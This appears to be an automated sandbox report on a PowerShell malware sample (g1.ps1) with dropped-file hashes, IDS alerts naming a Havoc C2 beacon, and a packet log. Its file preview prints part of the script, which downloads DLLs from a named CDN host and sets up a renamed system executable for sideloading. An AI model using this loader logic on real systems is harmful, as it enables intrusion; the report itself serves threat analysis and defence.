SSDEEP:	1536:X35P3jusa9Y8yQ7tCyFvKfD/B1Tu00arKEYdkulZg6nILNnjjtCPd+:HhyvPn3BKfD/BmDd46naIl+
MD5:	32C31F06E0B68F349F68AFDD08E45F3D
SHA1:	E4B642F887E2C1D76B6B4777ADE91E3CB3B9E27C
SHA-256:	CEA83EB34233FED5EBEEF8745C7C581A8ADBEFBCFC0E30E2D30A81000C821017
SHA-512:	FE61764B471465B164C9C2202ED349605117D57CEB0ECA75ACF8BDA44E8744C115767EE0CAED0B7FEB70BA37B477D00805B3FDF0D0FA879DD4C8E3C1DC1C0D26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i.`.-...-...-...$......9.../...9...:...9...)...9...6...-.......9...5...9...,...9...,...Rich-...........................PE..d................."............................@....................................-................ .......................................?.......... J...p...........%..........p1..T.......................(................... ................................text............................... ..`.imrsiv..................................rdata..\|H.......J..................@..@.data........`.......0..............@....pdata.......p.......2..............@..@.rsrc... J.......L...<..............@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rehemrb.20r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwlmme2b.4eo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\onedrive.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	103935
Entropy (8bit):	7.99838838197664
Encrypted:	true
SSDEEP:	3072:60qxVYqu86EBItwjTJ1wMJVKhoTivyCegz27:+YquBEBkIJ1wyK6TiaCy7
MD5:	3465C5A7982478CA2CE4879588765BEF
SHA1:	521090C64B1F8B9CD85AC4B30A8F3AB074A48B87
SHA-256:	265EB6BAFC6578DC502F61164D005E19BD2C4779ACFA9D1A1451741173C26D2A
SHA-512:	DCB165BF63D7EAA840152387B28168F9421ADA445B1921CB8065D94F9A90AD3870971D5585398F4065869D965B5EFE0C1C033646B3B764B22EFB7F7648B714E7
Malicious:	false
Preview:	....U.u.y..y..f..A.....V...~.."fv...9......Pc...V6.P.x./0;.P..h...).Gz.H..;_.)......s(l.....yh..V..L..c..#Tj....<b....'.a..3....\|.W....Vy..k."....9..}U"4...@0Z4^.-..-.......#......A..u........d.7.......~N.....x.K.5.q.=...&=N:...4.<...i.$6.4.....y..2.......b..U?.tdC.7..o.b..w..Z.......\|u...4....0..iP..........qP6.S.h...W..?........._.Z,.....9....].......j. .+OR...\_.U..V...Y\....K.J..(......~.8..s....qm.K.-..T.....j.....".z...0g..b.H..K....a.W..U......@..X....d$.}.L..i.y..J."..t.%aJ...x"..T._.Es2.T[.rV-m.w.J@....Y...<cZ.=.r.y..i....2>...nn...I&...!.<.....M...\P-.t.x.M.............\F0....M..g.?..N.p.RT........p5(0<B...N.k..ME........0..?.....G.k..p..a(..M?.'(t...mY..4.'u....ia.....Q...WU..$?);N&...E..np.......cj.R._...mE...t.."..".OX.....u.).........e...M.V..v ....3....L..,]......6...h.X...)...x..b.}.-k.,.....s../......<M}_..l..:..........v.Pf.. A9n!........R.6..q. "...'....?.?:.c...Y........m.....U+..m.. H..a*..%....[..M..Cx.)...y.

C:\Users\user\AppData\Local\Temp\sppc.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	371712
Entropy (8bit):	5.759165377548223
Encrypted:	false
SSDEEP:	6144:Uw0S36K/TZciXhJD1LrYwcjyZSIFGzLlN2A/W7vsg+Nq:Uw0S36K/TZciXhJj4I8zLl/e7vsg+o
MD5:	24E4E24E91E1FD8ACBEF02ABF5997317
SHA1:	9EDA6BE281400218C011380929F6879DBF48754C
SHA-256:	758BB067ECC1D7832D1B389CFA85B70376645694C60B5D017747B1E1664CB2F6
SHA-512:	BCCB40046F1FD4C4A68422912BE4B484B7B80402111D8093EB00ECA74D831947E7B9D03E1E403A677885263EB36C130D495A7A817AAAF8EE78A5B1F64B58D357
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.1...}.1.....1...p.jb..s.jb..t.jb..Z.1...y.z...1c..y.1c..{.1cH.{.1c..{.Richz.........................PE..d...N.Yg.........." ...)............ .......................................0............`..........................................Y.......p..(...............\|2........... ......@=..p............................<..@............ ...............................text...-........................... ..`.rdata...Y... ...Z..................@..@.data....I...........b..............@....pdata..\|2.......4...n..............@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.700736976179755
Encrypted:	false
SSDEEP:	96:aQ2reGdCteopkvhkvCCtJXwEVHuXwEC9HC:aQ2reGQeWJX2X5
MD5:	102953EC0B7F2F98B8841B2B7559FEC4
SHA1:	BA15738E829B200A33A170DB973AAA696D5F3A53
SHA-256:	F2AB78FDAC19058B60047C8428B95C7C6275DD31023427B075BC23E3E4E01875
SHA-512:	CC38DF74A825CAC95B45F6CC99BBC9DA8CF2AEA7BB0604338AD4DC2E24C70D41740CD721E3AA2517D4BEFAB88264BCC255D7B539C2B2C0F99B28565F2C9C997B
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......Y..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......fp..R..e....R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y{d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.d..Roaming.@......DWSl.Y.d....C.....................T ..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlDW.q....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSlDW"r....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.d....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OOQ9B3S8E5L5FDSQ29AO.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.700736976179755
Encrypted:	false
SSDEEP:	96:aQ2reGdCteopkvhkvCCtJXwEVHuXwEC9HC:aQ2reGQeWJX2X5
MD5:	102953EC0B7F2F98B8841B2B7559FEC4
SHA1:	BA15738E829B200A33A170DB973AAA696D5F3A53
SHA-256:	F2AB78FDAC19058B60047C8428B95C7C6275DD31023427B075BC23E3E4E01875
SHA-512:	CC38DF74A825CAC95B45F6CC99BBC9DA8CF2AEA7BB0604338AD4DC2E24C70D41740CD721E3AA2517D4BEFAB88264BCC255D7B539C2B2C0F99B28565F2C9C997B
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......Y..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......fp..R..e....R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y{d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.d..Roaming.@......DWSl.Y.d....C.....................T ..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlDW.q....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW"r..Windows.@......DWSlDW"r....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.d....q...........

Static File Info

General

File type:	ASCII text, with very long lines (485), with CRLF line terminators
Entropy (8bit):	5.106417674808187
TrID:
File name:	g1.ps1
File size:	487 bytes
MD5:	78e07513650c1a45dcd2b15ab20d3691
SHA1:	6066bd405222b5ebf50910dca44864f76bdc34ae
SHA256:	6750a7e6eb02eecab234f42a6cc6a88c1510d557336d53a85c02ad43776d8cb9
SHA512:	1cc22db75cf7c3aa34f1cc9745970a08b8309800895ecc098cffafdc569526282def6764a319306cea4e0b655eafd1e059c2233bc6e0d1d144e0b786f5d7e51e
SSDEEP:	12:aJhteFVc2JhajNmo99X564cXex3WGHzh8c8vGHYHh8cCkL5r1M8DgdK:aNmp6jco99X04NNbHzCcPHYHCcxL5K1E
TLSH:	DBF05C71D62C6234C4FB82DADC65F55FA2A5E8694EA1386C03BCF842E0629BC5FC14F4
File Content Preview:	$url2 = 'bangla.b-cdn.net/onedrive.dll'; $url3 = 'bangla.b-cdn.net/sppc.dll';$source = "C:\Windows\System32\phoneactivate.exe"; $destination = Join-Path $env:TEMP "Onedrive.exe"; $outputPath2 = $env:TEMP + '\onedrive.dll'; $outputPath3 = $env:TEMP + '\spp

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T13:36:16.330798+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	89.35.237.170	80	TCP
2024-12-19T13:36:18.473200+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	89.35.237.170	443	TCP
2024-12-19T13:36:22.689457+0100	2056539	ET MALWARE Havoc Demon CnC Request	1	192.168.2.5	49709	47.84.196.148	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 13:36:09.868098021 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:09.987881899 CET	80	49704	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:09.988051891 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:09.991586924 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:10.111500978 CET	80	49704	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:11.410036087 CET	80	49704	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:11.437372923 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:11.437427044 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:11.437500000 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:11.455787897 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:11.577616930 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:11.577678919 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.128887892 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.128967047 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.138632059 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.138652086 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.139108896 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.155778885 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.203341007 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.763628960 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.815188885 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.884052038 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884068012 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884140015 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884176970 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884197950 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.884232998 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884249926 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.884284973 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.884284973 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.884284973 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.884315968 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.990324020 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.990360022 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.990441084 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.990530014 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:13.990653038 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:13.990653038 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.032118082 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.032155037 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.032289028 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.032332897 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.032368898 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.032394886 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.152827024 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.152870893 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.153053045 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.153074980 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.153141975 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.177817106 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.177860022 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.178083897 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.178092957 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.178148031 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.197689056 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.197727919 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.197829008 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.197850943 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.197912931 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.208553076 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.208668947 CET	443	49705	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.208771944 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.208771944 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.352047920 CET	49705	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.726337910 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.727382898 CET	49706	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.846493006 CET	80	49704	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.846574068 CET	49704	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.847017050 CET	80	49706	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:14.847106934 CET	49706	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.847450018 CET	49706	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:14.967400074 CET	80	49706	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:16.276683092 CET	80	49706	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:16.280313969 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:16.280426025 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:16.280638933 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:16.280858040 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:16.280879021 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:16.330797911 CET	49706	80	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:17.828315973 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:17.830387115 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:17.830456972 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.473181009 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.518321991 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.593115091 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.593132973 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.593168974 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.593199968 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.593364954 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.593364954 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.593391895 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.593537092 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.697771072 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.697803974 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.698065042 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.698116064 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.698348999 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.739401102 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.739433050 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.739538908 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.739557028 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.739706039 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.858803034 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.858844042 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.859060049 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.859060049 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.859113932 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.859282017 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.882496119 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.882536888 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.882738113 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.882750988 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.882970095 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.905699015 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.905728102 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.905953884 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.905968904 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.906176090 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.980792999 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.980856895 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.981025934 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.981025934 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.981050968 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.981100082 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.996088982 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.996145964 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.996208906 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.996220112 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:18.996259928 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:18.996287107 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.062918901 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.062941074 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.062998056 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.063016891 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.063043118 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.063066006 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.076096058 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.076121092 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.076201916 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.076216936 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.076275110 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.091455936 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.091471910 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.091562033 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.091586113 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.091643095 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.106903076 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.106916904 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.106990099 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.107000113 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.107064009 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.118340969 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.118355036 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.118447065 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.118457079 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.118505001 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.130951881 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.130965948 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.131052017 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.131062031 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.131118059 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.143307924 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.143326998 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.143506050 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.143536091 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.143598080 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.162412882 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.162456036 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.162497044 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.162520885 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.162652969 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.162652969 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.244168997 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.244184971 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.244277000 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.244299889 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.244354963 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.252923012 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.252938032 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.253026009 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.253041983 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.253094912 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.260135889 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.260199070 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.260245085 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.260261059 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.260304928 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.260325909 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.267510891 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.267554045 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.267608881 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.267625093 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.267664909 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.267688036 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.278445005 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.278491020 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.278548956 CET	49707	443	192.168.2.5	89.35.237.170
Dec 19, 2024 13:36:19.278557062 CET	443	49707	89.35.237.170	192.168.2.5
Dec 19, 2024 13:36:19.278613091 CET	49707	443	192.168.2.5	89.35.237.170
